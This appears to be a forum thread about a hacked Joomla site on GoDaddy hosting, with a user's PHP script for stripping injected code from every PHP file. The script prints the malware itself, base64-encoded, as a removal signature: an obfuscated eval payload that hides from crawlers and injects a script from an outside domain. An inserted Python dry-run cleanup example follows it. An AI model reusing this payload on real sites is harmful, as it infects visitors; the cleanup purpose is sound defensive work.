qab
Forum Replies Created
Forum: Plugins
In reply to: Site Hacked
Yes, I agree, petercasier. It is not a vulnerability in WordPress, Joomla or Drupal; it's a vulnerability in GoDaddy itself as a host. This is very disappointing, I must say.
Forum: Plugins
In reply to: Site Hacked
This is the script I developed and used with success.
It's kind of tricky; you need to do a couple of things before using the script.
Run this command over SSH: find . -name "*.php" -type f -print
That will display all PHP files in your directory, including subdirectories.
If you don't know how to execute it, just use a cron job; it should email it to you with no problem.
Now you save it in a txt file named "php.txt".
Upload php.txt with anything.php; anything.php contains the following:
(please change what I ask you to change)
The script isn't perfect but should do the job. Only use this as a last resort, and back up your website before use as well, just in case.
<?php
$files = file_get_contents('php.txt');
$afiles = explode("\n", $files);
for ($i = 0; $i < count($afiles); $i++) {
    // you might want to lessen the loops if your website is big
    if (trim($afiles[$i]) === '') {
        continue; // skip blank lines, such as the one at the end of php.txt
    }
    qabandi($afiles[$i]);
}

function qabandi($file) {
    $sick = "{rest of location}" . trim($file); // this is where you add the rest of location
    $content = @file_get_contents($sick);
    if ($content === false) {
        // could not read the file: do not open it with "w+", that would empty it
        echo($sick . "[skipped]\n");
        return;
    }
    $clean = str_replace(bad(), "", $content);
    $handle = fopen($sick, "w+");
    fwrite($handle, $clean);
    fclose($handle);
    echo($sick . "[cleaned]\n");
}

function bad() {
    return base64_decode("PD9waHAgLyoqLyBldmFsKGJhc2U2NF9kZWNvZGUoImFXWW9ablZ1WTNScGIyNWZaWGhwYzNSektD ZHZZbDl6ZEdGeWRDY3BKaVloYVhOelpYUW9KRWRNVDBKQlRGTmJKMjF5WDI1dkoxMHBLWHNnSUNB a1IweFBRa0ZNVTFzbmJYSmZibThuWFQweE95QWdJR2xtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1v SjIxeWIySm9KeWtwZXlBZ0lDQWdJR2xtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1vSjJkdGJDY3BL WHNnSUNBZ0lHWjFibU4wYVc5dUlHZHRiQ2dwZXlBZ0lDQWdJR2xtSUNnaGMzUnlhWE4wY2lna1gx TkZVbFpGVWxzaVNGUlVVRjlWVTBWU1gwRkhSVTVVSWwwc0ltZHZiMmRzWldKdmRDSXBKaVlnS0NG emRISnBjM1J5S0NSZlUwVlNWa1ZTV3lKSVZGUlFYMVZUUlZKZlFVZEZUbFFpWFN3aWVXRm9iMjhp S1NrcGV5QWdJQ0FnSUNCeVpYUjFjbTRnWW1GelpUWTBYMlJsWTI5a1pTZ2lVRWhPYW1OdGJIZGtR MEo2WTIxTk9VbHRhREJrU0VFMlRIazVjbHBIY0hKYWJYQjZZVEpTYldGdGVIcGhNbEp4V21rMWFt SXlNSFpoTTBGMVkwZG9kMGxxTkRoTU0wNXFZMjFzZDJSRU5EMGlLVHNnSUNBZ0lDQjlJQ0FnSUNB Z2NtVjBkWEp1SUNJaU95QWdJQ0FnZlNBZ0lDQjlJQ0FnSUNBZ0lDQnBaaWdoWm5WdVkzUnBiMjVm WlhocGMzUnpLQ2RuZW1SbFkyOWtaU2NwS1hzZ0lDQWdJR1oxYm1OMGFXOXVJR2Q2WkdWamIyUmxL Q1JTTlVFNVEwWXhRalE1TnpVd01rRkRRVEl6UXpoR05qRXhRVFUyTkRZNE5FTXBleUFnSUNBZ0lD UlNNekJDTWtGQ09FUkRNVFE1TmtRd05rSXlNekJCTnpGRU9EazJNa0ZHTlVROVFHOXlaQ2hBYzNW aWMzUnlLQ1JTTlVFNVEwWXhRalE1TnpVd01rRkRRVEl6UXpoR05qRXhRVFUyTkRZNE5FTXNNeXd4 S1NrN0lDQWdJQ0FnSkZKQ1JUUkRORVF3TXpkRk9UTTVNakkyUmpZMU9ERXlPRGcxUVRVelJFRkVP VDB4TURzZ0lDQWdJQ0FrVWtFelJEVXlSVFV5UVRRNE9UTTJRMFJGTUVZMU16VTJRa0l3T0RZMU1r WXlQVEE3SUNBZ0lDQWdhV1lvSkZJek1FSXlRVUk0UkVNeE5EazJSREEyUWpJek1FRTNNVVE0T1RZ eVFVWTFSQ1kwS1hzZ0lDQWdJQ0FnSkZJMk0wSkZSRVUyUWpFNU1qWTJSRFJGUmtWQlJEQTNRVFJF 
T1RGRk1qbEZRajFBZFc1d1lXTnJLQ2QySnl4emRXSnpkSElvSkZJMVFUbERSakZDTkRrM05UQXlR VU5CTWpORE9FWTJNVEZCTlRZME5qZzBReXd4TUN3eUtTazdJQ0FnSUNBZ0lDUlNOak5DUlVSRk5r SXhPVEkyTmtRMFJVWkZRVVF3TjBFMFJEa3hSVEk1UlVJOUpGSTJNMEpGUkVVMlFqRTVNalkyUkRS RlJrVkJSREEzUVRSRU9URkZNamxGUWxzeFhUc2dJQ0FnSUNBZ0pGSkNSVFJETkVRd016ZEZPVE01 TWpJMlJqWTFPREV5T0RnMVFUVXpSRUZFT1NzOU1pc2tVall6UWtWRVJUWkNNVGt5TmpaRU5FVkdS VUZFTURkQk5FUTVNVVV5T1VWQ095QWdJQ0FnSUgwZ0lDQWdJQ0JwWmlna1VqTXdRakpCUWpoRVF6 RTBPVFpFTURaQ01qTXdRVGN4UkRnNU5qSkJSalZFSmpncGV5QWdJQ0FnSUNBa1VrSkZORU0wUkRB ek4wVTVNemt5TWpaR05qVTRNVEk0T0RWQk5UTkVRVVE1UFVCemRISndiM01vSkZJMVFUbERSakZD TkRrM05UQXlRVU5CTWpORE9FWTJNVEZCTlRZME5qZzBReXhqYUhJb01Da3NKRkpDUlRSRE5FUXdN emRGT1RNNU1qSTJSalkxT0RFeU9EZzFRVFV6UkVGRU9Ta3JNVHNnSUNBZ0lDQjlJQ0FnSUNBZ2FX WW9KRkl6TUVJeVFVSTRSRU14TkRrMlJEQTJRakl6TUVFM01VUTRPVFl5UVVZMVJDWXhOaWw3SUNB Z0lDQWdJQ1JTUWtVMFF6UkVNRE0zUlRrek9USXlOa1kyTlRneE1qZzROVUUxTTBSQlJEazlRSE4w Y25CdmN5Z2tValZCT1VOR01VSTBPVGMxTURKQlEwRXlNME00UmpZeE1VRTFOalEyT0RSRExHTm9j aWd3S1N3a1VrSkZORU0wUkRBek4wVTVNemt5TWpaR05qVTRNVEk0T0RWQk5UTkVRVVE1S1NzeE95 QWdJQ0FnSUgwZ0lDQWdJQ0JwWmlna1VqTXdRakpCUWpoRVF6RTBPVFpFTURaQ01qTXdRVGN4UkRn NU5qSkJSalZFSmpJcGV5QWdJQ0FnSUNBa1VrSkZORU0wUkRBek4wVTVNemt5TWpaR05qVTRNVEk0 T0RWQk5UTkVRVVE1S3oweU95QWdJQ0FnSUgwZ0lDQWdJQ0FrVWpBek5FRkZNa0ZDT1RSR09UbERR emd4UWpNNE9VRXhPREl5UkVFek16VXpQVUJuZW1sdVpteGhkR1VvUUhOMVluTjBjaWdrVWpWQk9V TkdNVUkwT1RjMU1ESkJRMEV5TTBNNFJqWXhNVUUxTmpRMk9EUkRMQ1JTUWtVMFF6UkVNRE0zUlRr ek9USXlOa1kyTlRneE1qZzROVUUxTTBSQlJEa3BLVHNnSUNBZ0lDQnBaaWdrVWpBek5FRkZNa0ZD T1RSR09UbERRemd4UWpNNE9VRXhPREl5UkVFek16VXpQVDA5UmtGTVUwVXBleUFnSUNBZ0lDQWtV akF6TkVGRk1rRkNPVFJHT1RsRFF6Z3hRak00T1VFeE9ESXlSRUV6TXpVelBTUlNOVUU1UTBZeFFq UTVOelV3TWtGRFFUSXpRemhHTmpFeFFUVTJORFk0TkVNN0lDQWdJQ0FnZlNBZ0lDQWdJSEpsZEhW eWJpQWtVakF6TkVGRk1rRkNPVFJHT1RsRFF6Z3hRak00T1VFeE9ESXlSRUV6TXpVek95QWdJQ0Fn ZlNBZ0lDQjlJQ0FnSUdaMWJtTjBhVzl1SUcxeWIySm9LQ1JTUlRneVJVVTVRakV5TVVZM01EazRP 
VFZGUmpVMFJVSkJOMFpCTmtJM09FSXBleUFnSUNBZ1NHVmhaR1Z5S0NkRGIyNTBaVzUwTFVWdVky OWthVzVuT2lCdWIyNWxKeWs3SUNBZ0lDQWtVa0V4TnpsQlFrUXpRVGRDT1VVeU9FTXpOamxHTjBJ MU9VTTFNVUk0TVVSRlBXZDZaR1ZqYjJSbEtDUlNSVGd5UlVVNVFqRXlNVVkzTURrNE9UVkZSalUw UlVKQk4wWkJOa0kzT0VJcE95QWdJQ0FnSUNCcFppaHdjbVZuWDIxaGRHTm9LQ2N2WER4Y0wySnZa SGt2YzJrbkxDUlNRVEUzT1VGQ1JETkJOMEk1UlRJNFF6TTJPVVkzUWpVNVF6VXhRamd4UkVVcEtY c2dJQ0FnSUNCeVpYUjFjbTRnY0hKbFoxOXlaWEJzWVdObEtDY3ZLRnc4WEM5aWIyUjVXMTVjUGww cVhENHBMM05wSnl4bmJXd29LUzRpWEc0aUxpY2tNU2NzSkZKQk1UYzVRVUpFTTBFM1FqbEZNamhE TXpZNVJqZENOVGxETlRGQ09ERkVSU2s3SUNBZ0lDQjlaV3h6WlhzZ0lDQWdJQ0J5WlhSMWNtNGdK RkpCTVRjNVFVSkVNMEUzUWpsRk1qaERNelk1UmpkQ05UbEROVEZDT0RGRVJTNW5iV3dvS1RzZ0lD QWdJSDBnSUNBZ2ZTQWdJQ0J2WWw5emRHRnlkQ2duYlhKdlltZ25LVHNnSUNCOUlDQjkiKSk7Pz4=");}function good(){return base64_decode("PD9QSFAgLyphbC1xYWJhbmRpQGhvdG1haWwuY29tKi8gPz4=");} ?>
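An added example, not part of the original post or the poster's code: the same exact-string cleanup written in Python so that it runs as a dry run first and keeps a .bak copy of every file it changes. The name clean_tree and the value SAMPLE_SIGNATURE are assumptions constructed for illustration; on a real site the signature is the exact injected block copied from an infected file.

```python
import os
import shutil
import tempfile

# Constructed stand-in for the injected block (not the real payload); on a
# real site use the exact bytes found in an infected file.
SAMPLE_SIGNATURE = b'<?php /**/ eval(base64_decode("Q09OU1RSVUNURUQ=")); ?>'


def clean_tree(root, signature, apply=False):
    """Report *.php files under root that contain signature (bytes).

    Dry run by default: nothing is modified. With apply=True each affected
    file is copied to <name>.bak, then replaced atomically by a cleaned copy.
    """
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable: skip it, never open it for writing
            if signature not in data:
                continue
            hits.append(path)
            if apply:
                shutil.copy2(path, path + ".bak")  # backup before any change
                fd, tmp = tempfile.mkstemp(dir=dirpath)
                with os.fdopen(fd, "wb") as out:
                    out.write(data.replace(signature, b""))
                shutil.copymode(path, tmp)  # keep the original permissions
                os.replace(tmp, path)  # atomic swap, no half-written file
    return sorted(hits)


if __name__ == "__main__":
    import sys
    for p in clean_tree(sys.argv[1], SAMPLE_SIGNATURE):
        print("infected:", p)
```

Review the dry-run list before calling it with apply=True, and move the .bak files out of the web root afterwards, since they still contain the injected code.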
Forum: Plugins
In reply to: Site Hacked
OK, the solution GoDaddy is giving, respectfully, is useless.
My website has Joomla installed and is hosted on a GoDaddy server. I'm proud to say I have completely removed the virus using my own scripting skills; all it took was 10 mins. The virus is hardly that; it's just code that somehow bypassed GoDaddy's security and was able to write itself to all PHP files.